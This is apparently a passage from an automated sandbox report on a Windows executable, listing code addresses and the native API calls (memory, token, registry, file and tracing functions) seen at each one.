Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270221F ZwCreateSection,ZwMapViewOfSection,memset,memcpy,ZwUnmapViewOfSection,ZwClose,	0_2_7270221F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649210 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,	0_2_72649210
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B2E0 TpSetPoolThreadBasePriority,ZwSetInformationWorkerFactory,TpSetPoolThreadBasePriority,	0_2_7264B2E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270B2E0 ZwQueryVirtualMemory,ZwProtectVirtualMemory,	0_2_7270B2E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A2F0 ZwQueryInformationFile,	0_2_7268A2F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D2FE RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,	0_2_7267D2FE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726722C3 RtlRunOnceExecuteOnce,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,	0_2_726722C3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726892CD RtlInitUnicodeString,RtlInitUnicodeString,ZwCreateFile,ZwSetInformationFile,RtlFreeUnicodeString,	0_2_726892CD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A2C0 ZwSetEvent,	0_2_7268A2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DB2C0 RtlAcquirePrivilege,RtlAllocateHeap,ZwSetInformationThread,RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwAdjustPrivilegesToken,RtlAllocateHeap,ZwAdjustPrivilegesToken,RtlFreeHeap,RtlFreeHeap,ZwClose,ZwSetInformationThread,ZwClose,RtlFreeHeap,	0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A2D0 ZwClose,	0_2_7268A2D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727012CA memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727012CA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D12B9 ZwAllocateVirtualMemory,memset,RtlInitializeSid,	0_2_726D12B9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726642B0 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap,	0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A2B0 ZwSetInformationThread,	0_2_7268A2B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726442BE RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,	0_2_726442BE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C3284 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,	0_2_726C3284
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267328D RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,	0_2_7267328D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72688284 ZwCreateThreadEx,ZwClose,	0_2_72688284
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72684290 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,	0_2_72684290
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266D36F memcmp,ZwSetInformationThread,RtlDeactivateActivationContextUnsafeFast,RtlSetThreadSubProcessTag,memset,RtlRaiseException,ZwSetInformationThread,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,	0_2_7266D36F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D137B ZwRaiseException,ZwTerminateProcess,	0_2_726D137B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A370 ZwQueryInformationProcess,	0_2_7268A370
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C3371 ZwOpenKeyEx,	0_2_726C3371
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72688375 ZwAllocateVirtualMemory,ZwFreeVirtualMemory,	0_2_72688375
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701351 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72701351
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72718356 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72718356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268C340 RtlUnhandledExceptionFilter,ZwTerminateProcess,	0_2_7268C340
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A340 ZwQueryKey,	0_2_7268A340
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268C350 RtlUnhandledExceptionFilter,ZwTerminateProcess,	0_2_7268C350
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A350 ZwQueryValueKey,	0_2_7268A350
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72715331 ZwSetEvent,ZwWaitForSingleObject,	0_2_72715331
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726CA32E ZwQueryInformationProcess,ZwMapViewOfSection,ZwClose,	0_2_726CA32E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685322 ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationObject,ZwSetInformationThread,ZwAdjustPrivilegesToken,ZwSetInformationThread,	0_2_72685322
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E328 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,	0_2_7264E328
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264C330 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,	0_2_7264C330
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A330 ZwQueryDefaultLocale,	0_2_7268A330
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649305 ZwClose,ZwClose,	0_2_72649305
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C308 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwUnmapViewOfSection,ZwClose,	0_2_7266C308
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlInitString,___swprintf_l,RtlInitString,RtlAllocateHeap,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A310 ZwEnumerateValueKey,	0_2_7268A310
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264D319 memset,ZwIsUILanguageComitted,RtlpGetNameFromLangInfoNode,ZwQueryInstallUILanguage,RtlLCIDToCultureName,RtlFreeHeap,	0_2_7264D319
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264F3E0 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,	0_2_7264F3E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A3E0 ZwFreeVirtualMemory,	0_2_7268A3E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726893F6 RtlAllocateHeap,RtlAllocateHeap,RtlCreateUnicodeString,ZwCreateEvent,ZwCreateEvent,RtlInitializeCriticalSectionEx,RtlQueryPerformanceCounter,RtlAllocateHeap,ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeHeap,	0_2_726893F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727183D7 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727183D7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A3C0 ZwSetInformationProcess,	0_2_7268A3C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727013D8 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727013D8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726593D0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,	0_2_726593D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726503DD RtlInitUnicodeString,ZwQueryValueKey,	0_2_726503DD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A3D0 ZwCreateKey,	0_2_7268A3D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D3AC RtlFreeHeap,RtlWakeAddressAllNoFence,RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlpUnWaitCriticalSection,ZwSetEvent,	0_2_7267D3AC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727043A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,	0_2_727043A4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D13B6 ZwCreateEvent,	0_2_726D13B6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C3BD RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,	0_2_7266C3BD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264A380 RtlCreateMemoryZone,ZwAllocateVirtualMemory,	0_2_7264A380
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B390 ZwOpenKeyEx,	0_2_7268B390
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701071 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72701071
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650070 RtlReportSilentProcessExit,memset,memset,RtlReportSilentProcessExit,ZwDuplicateObject,memset,memset,ZwWaitForSingleObject,ZwClose,ZwClose,	0_2_72650070
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72705053 ZwProtectVirtualMemory,	0_2_72705053
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685040 TpCheckTerminateWorker,TpCheckTerminateWorker,ZwDuplicateObject,ZwQueryInformationThread,ZwQueryInformationThread,ZwClose,DbgPrintEx,memset,RtlRaiseException,TpCheckTerminateWorker,	0_2_72685040
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C04A RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,	0_2_7266C04A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D6042 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,	0_2_726D6042
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72717030 RtlCompressBuffer,memcpy,ZwWriteFile,memcpy,	0_2_72717030
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645020 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,	0_2_72645020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72659001 RtlWow64EnableFsRedirectionEx,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlWow64EnableFsRedirectionEx,	0_2_72659001
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268C000 ZwWow64IsProcessorFeaturePresent,	0_2_7268C000
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701008 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72701008
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726890EA memset,memset,ZwClose,	0_2_726890EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727180F7 ZwAlpcSendWaitReceivePort,RtlFreeHeap,	0_2_727180F7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726570E9 RtlEqualUnicodeString,ZwMapViewOfSection,ZwUnmapViewOfSection,LdrQueryImageFileKeyOption,RtlAcquirePrivilege,RtlReleasePrivilege,	0_2_726570E9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266E0E8 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,	0_2_7266E0E8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726480C0 RtlUnlockMemoryZone,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwUnlockVirtualMemory,	0_2_726480C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B0C0 ZwGetCurrentProcessorNumber,	0_2_7268B0C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726540CC ZwQueryInformationToken,RtlFindAceByType,RtlFindAceByType,RtlFindAceByType,RtlAllocateHeap,memcpy,memcpy,memcpy,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlCreateSecurityDescriptor,RtlFreeHeap,RtlCreateAcl,RtlAddMandatoryAce,RtlFreeHeap,memcpy,RtlFreeHeap,RtlSidDominates,RtlFindAceByType,RtlCreateAcl,RtlAddProcessTrustLabelAce,RtlFreeHeap,ZwDuplicateToken,ZwAccessCheck,ZwClose,ZwPrivilegeCheck,ZwPrivilegeCheck,RtlFreeHeap,memset,memset,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,	0_2_726540CC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267C0D7 RtlImageNtHeaderEx,ZwProtectVirtualMemory,	0_2_7267C0D7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726CA0DE ZwRaiseHardError,	0_2_726CA0DE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726490D0 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,	0_2_726490D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727150CC ZwTraceControl,	0_2_727150CC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727010CF RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727010CF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726870AB ZwCancelWaitCompletionPacket,RtlDebugPrintTimes,	0_2_726870AB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B0A0 ZwGetCompleteWnfStateSubscription,	0_2_7268B0A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726770AF RtlInitializeCriticalSectionEx,ZwDelayExecution,	0_2_726770AF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72658080 RtlAcquireSRWLockExclusive,ZwProtectVirtualMemory,ZwProtectVirtualMemory,RtlReleaseSRWLockExclusive,	0_2_72658080
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72647090 ZwClose,RtlFreeHeap,RtlFreeHeap,	0_2_72647090
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B090 ZwGetCachedSigningLevel,	0_2_7268B090
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648160 RtlUnlockModuleSection,RtlAcquireSRWLockExclusive,ZwUnlockVirtualMemory,RtlFreeHeap,RtlReleaseSRWLockExclusive,	0_2_72648160
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264516E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,	0_2_7264516E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72715162 ZwClose,RtlWakeAllConditionVariable,	0_2_72715162
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D5170 DbgPrompt,ZwWow64DebuggerCall,	0_2_726D5170
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701151 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72701151
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726CA146 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel,	0_2_726CA146
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72658123 ZwProtectVirtualMemory,LdrControlFlowGuardEnforced,LdrControlFlowGuardEnforced,ZwProtectVirtualMemory,ZwProtectVirtualMemory,	0_2_72658123
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266D121 RtlFreeHeap,ZwSetInformationThread,ZwSetInformationThread,ZwSetInformationObject,ZwClose,ZwSetInformationThread,	0_2_7266D121
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B120 ZwGetNlsSectionPtr,	0_2_7268B120
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D113A ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,	0_2_726D113A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B101 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,	0_2_7264B101
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D6105 memset,memcpy,ZwTraceEvent,	0_2_726D6105
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72677110 memset,RtlRandomEx,RtlRandomEx,ZwQueryInformationProcess,ZwQueryInformationProcess,	0_2_72677110
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264411D RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,	0_2_7264411D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726451E0 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,	0_2_726451E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A1E0 ZwAccessCheck,	0_2_7268A1E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C1F6 ZwCreateFile,ZwCreateFile,	0_2_7266C1F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A1F0 ZwWorkerFactoryWorkerReady,	0_2_7268A1F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727011D2 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727011D2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727151D5 RtlNtStatusToDosError,ZwWaitForSingleObject,ZwClose,	0_2_727151D5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267B1C0 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,	0_2_7267B1C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B1C0 ZwIsUILanguageComitted,	0_2_7268B1C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727171DC ZwWriteFile,	0_2_727171DC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726851C6 ZwOpenKey,ZwQueryValueKey,ZwClose,	0_2_726851C6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726CA1AC ZwCompareSigningLevels,ZwCompareSigningLevels,	0_2_726CA1AC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D11AC ZwOpenEvent,ZwWaitForSingleObject,ZwClose,	0_2_726D11AC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D1B7 RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlDebugPrintTimes,	0_2_7267D1B7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DE1B3 ZwOpenThreadTokenEx,ZwOpenThreadTokenEx,	0_2_726DE1B3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B180 ZwInitializeNlsFiles,	0_2_7268B180
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C7194 RtlAllocateHeap,memcpy,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,	0_2_726C7194
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F3660 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,	0_2_726F3660
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271864B RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271864B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C620 TpCallbackIndependent,ZwSetInformationWorkerFactory,TpCallbackIndependent,	0_2_7266C620
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A620 ZwDuplicateToken,	0_2_7268A620
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72719623 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72719623
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C660A RtlGetCurrentServiceSessionId,RtlAllocateHeap,memcpy,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,	0_2_726C660A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A600 ZwOpenEvent,	0_2_7268A600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A610 ZwAdjustPrivilegesToken,	0_2_7268A610
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B61F RtlImageNtHeader,ZwQueryVirtualMemory,	0_2_7264B61F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716E5 RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,	0_2_726716E5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C76FC ZwQueryVirtualMemory,	0_2_726C76FC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A6C0 ZwApphelpCacheControl,	0_2_7268A6C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726866D0 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,	0_2_726866D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726466A4 RtlInitUnicodeString,ZwQueryValueKey,	0_2_726466A4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726746A4 RtlRandomEx,ZwQueryInformationProcess,	0_2_726746A4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F66A2 ZwSetInformationVirtualMemory,	0_2_726F66A2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716B3 ZwClose,ZwClose,	0_2_726716B3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B6B0 ZwQueryLicenseValue,	0_2_7268B6B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727186A9 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727186A9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D16B6 ZwQueryInformationProcess,	0_2_726D16B6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B680 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,	0_2_7264B680
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D1689 ZwQueryInformationProcess,	0_2_726D1689
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A680 ZwCreateEvent,	0_2_7268A680
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B680 ZwQueryInstallUILanguage,	0_2_7268B680
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271469B ZwTraceControl,	0_2_7271469B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271969E RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271969E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A690 ZwQueryVolumeInformationFile,	0_2_7268A690
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265669E RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,	0_2_7265669E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C3693 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,	0_2_726C3693
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267F76C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,	0_2_7267F76C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D76B ZwWaitForAlertByThreadId,	0_2_7267D76B
